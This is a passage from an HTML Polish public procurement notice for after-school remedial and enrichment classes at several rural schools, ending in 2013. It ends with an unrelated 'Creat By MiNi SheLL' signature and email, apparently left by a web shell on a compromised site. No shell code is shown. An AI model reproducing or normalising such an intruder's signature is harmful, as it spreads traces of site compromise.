Zajęcia pozalekcyjne dydaktyczno-wyrównawcze z matematyki dla uczniów mających trudności w nauce, w szczególności w spełnianiu wymagań edukacyjnych wynikających z podstawy programowej kształcenia ogólnego dla danego etapu edukacyjnego (Szkoła Podstawowa) - 58 godzin
- grupa 1 - 58 godzin
Zadanie 40
Zajęcia z zakresu doradztwa i opieka pedagogiczno-psychologiczna dla uczniów wykazujących problemy w nauce lub z innych przyczyn zagrożonych przedwczesnym wypadnięciem z systemu oświaty (Szkoła Podstawowa) - 9 godzin
- grupa 1 - 9 godzin
Zadanie 41
Zajęcia pozalekcyjne rozwijające zainteresowania uczniów zdolnych z zakresu matematyki przez wykorzystaniu aktywnych metod pracy (Gimnazjum) - 58 godzin
- grupa 1 - 58 godzin
Zadanie 42
Zajęcia pozalekcyjne rozwijające zainteresowania uczniów zdolnych z zakresu przedsiębiorczości przez wykorzystaniu aktywnych metod pracy (Gimnazjum) - 58 godzin
- grupa 1 - 58 godzin
Zadanie 43
Zajęcia pozalekcyjne rozwijające zainteresowania uczniów zdolnych z zakresu ekspresji kulturalnej przez wykorzystaniu aktywnych metod pracy (Gimnazjum) - 58 godzin
- grupa 1 - 58 godzin
Zadanie 44
Zajęcia pozalekcyjne dydaktyczno-wyrównawcze z języka polskiego dla uczniów mających trudności w nauce, w szczególności w spełnianiu wymagań edukacyjnych wynikających z podstawy programowej kształcenia ogólnego dla danego etapu edukacyjnego (Gimnazjum) - 116 godzin
- grupa 1, 2 - 116 godzin
Zadanie 45
Zajęcia pozalekcyjne dydaktyczno-wyrównawcze z matematyki dla uczniów mających trudności w nauce, w szczególności w spełnianiu wymagań edukacyjnych wynikających z podstawy programowej kształcenia ogólnego dla danego etapu edukacyjnego (Gimnazjum) - 116 godzin
- grupa 1,2 - 116 godzin
Zadanie 46
Zajęcia z zakresu poradnictwa i doradztwa edukacyjno-zawodowego (spotkania indywidualne) informujące uczniów o korzyściach płynących z wyboru danej ścieżki edukacyjnej oraz możliwościach dalszego kształcenia w kontekście uwarunkowań lokalnego i regionalnego rynku pracy (Gimnazjum) - 32 godzin
- grupa 1 - 32 godziny
Zadanie 47
Zajęcia z zakresu doradztwa i opieka pedagogiczno-psychologiczna dla uczniów wykazujących problemy w nauce lub z innych przyczyn zagrożonych przedwczesnym wypadnięciem z systemu oświaty (Gimnazjum) - 45 godzin
- grupa 1 - 45 godzin.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.10.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Szkoła Podstawowa Wola Zadybska.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie 48
Zajęcia pozalekcyjne rozwijające zainteresowania uczniów zdolnych z języka angielskiego przez wykorzystaniu aktywnych metod pracy - 116 godzin
- grupa 1 - 116 godzin
Zadanie 49
Zajęcia pozalekcyjne rozwijające zainteresowania uczniów zdolnych z zakresu matematyki przez wykorzystaniu aktywnych metod pracy  - 116 godzin
- grupa 1- 58 godzin 
- grupa 2 - 58 godzin
Zadanie 50
Zajęcia pozalekcyjne rozwijające zainteresowania uczniów zdolnych z zakresu informatyki przez wykorzystaniu aktywnych metod pracy - 58 godzin
- grupa 1 - 58 godzin
Zadanie 51
Zajęcia pozalekcyjne rozwijające zainteresowania uczniów zdolnych z zakresu ekspresji kulturalnej przez wykorzystaniu aktywnych metod pracy - 58 godzin
- grupa 1 - 58 godzin
Zadanie 52
Zajęcia pozalekcyjne dydaktyczno-wyrównawcze z języka polskiego dla uczniów mających trudności w nauce, w szczególności w spełnianiu wymagań edukacyjnych wynikających z podstawy programowej kształcenia ogólnego dla danego etapu edukacyjnego - 174 godzin
- grupa 1 - 58 godzin
- grupa 2 - 58 godzin
- grupa 3 - 58 godzin
Zadanie 53
Zajęcia pozalekcyjne dydaktyczno-wyrównawcze z matematyki dla uczniów mających trudności w nauce, w szczególności w spełnianiu wymagań edukacyjnych wynikających z podstawy programowej kształcenia ogólnego dla danego etapu edukacyjnego - 58 godzin
- grupa 1 - 58 godzin.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.10.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Szkoła Podstawowa w Kawęczynie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie 54
Zajęcia pozalekcyjne rozwijające zainteresowania uczniów zdolnych z języka angielskiego przez wykorzystaniu aktywnych metod pracy - 58 godzin
- grupa 1 - 58 godzin
Zadanie 55
Zajęcia pozalekcyjne rozwijające zainteresowania uczniów zdolnych z zakresu matematyki przez wykorzystaniu aktywnych metod pracy  - 116 godzin
- grupa 1- 58 godzin 
- grupa 2 - 58 godzin 
Zadanie 56
Zajęcia pozalekcyjne rozwijające zainteresowania uczniów zdolnych z zakresu ekspresji kulturalnej przez wykorzystaniu aktywnych metod pracy - 348 godzin
- grupa 1,2- 116 godzin 
- grupa 3,4- 116 godzin 
- grupa 5,6 - 116 godzin 
Zadanie 57
Zajęcia pozalekcyjne dydaktyczno-wyrównawcze z języka polskiego dla uczniów mających trudności w nauce, w szczególności w spełnianiu wymagań edukacyjnych wynikających z podstawy programowej kształcenia ogólnego dla danego etapu edukacyjnego - 58 godzin
- grupa 1 - 58 godzin
Zadanie 58
Zajęcia pozalekcyjne dydaktyczno-wyrównawcze z matematyki dla uczniów mających trudności w nauce, w szczególności w spełnianiu wymagań edukacyjnych wynikających z podstawy programowej kształcenia ogólnego dla danego etapu edukacyjnego - 116 godzin
- grupa 1 - 58 godzin 
- grupa 2- 58 godzin.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.10.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Szkoła Podstawowa w Starym Zadybiu.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie 59
Zajęcia pozalekcyjne rozwijające zainteresowania uczniów zdolnych z języka polskiego przez wykorzystaniu aktywnych metod pracy - 116 godzin 
- grupa 1 - 58 godzin
- grupa 2 - 58 godzin 
Zadanie 60
Zajęcia pozalekcyjne rozwijające zainteresowania uczniów zdolnych z języka angielskiego przez wykorzystaniu aktywnych metod pracy - 116 godzin
- grupa 1,2 - 116 godzin
Zadanie 61
Zajęcia pozalekcyjne rozwijające zainteresowania uczniów zdolnych z zakresu matematyki przez wykorzystaniu aktywnych metod pracy  - 116 godzin
- grupa 1- 58 godzin 
- grupa 2 - 58 godzin
Zadanie 62
Zajęcia pozalekcyjne rozwijające zainteresowania uczniów zdolnych z zakresu przyrody przez wykorzystaniu aktywnych metod pracy - 58 godzin
- grupa 1 - 58 godzin
Zadanie 63
Zajęcia pozalekcyjne rozwijające zainteresowania uczniów zdolnych z zakresu ekspresji kulturalnej przez wykorzystaniu aktywnych metod pracy - 58 godzin
- grupa 1 - 58 godzin
Zadanie 64
Zajęcia pozalekcyjne dydaktyczno-wyrównawcze z matematyki dla uczniów mających trudności w nauce, w szczególności w spełnianiu wymagań edukacyjnych wynikających z podstawy programowej kształcenia ogólnego dla danego etapu edukacyjnego - 116 godzin
- grupa 1- 58 godzin 
- grupa 2 - 58 godzin
Zadanie 65
Zajęcia pozalekcyjne dydaktyczno-wyrównawcze z języka polskiego dla uczniów mających trudności w nauce, w szczególności w spełnianiu wymagań edukacyjnych wynikających podstawy programowej kształcenia ogólnego dla danego etapu edukacyjnego - 58 godzin 
- grupa 1 - 58 godzin.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.10.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com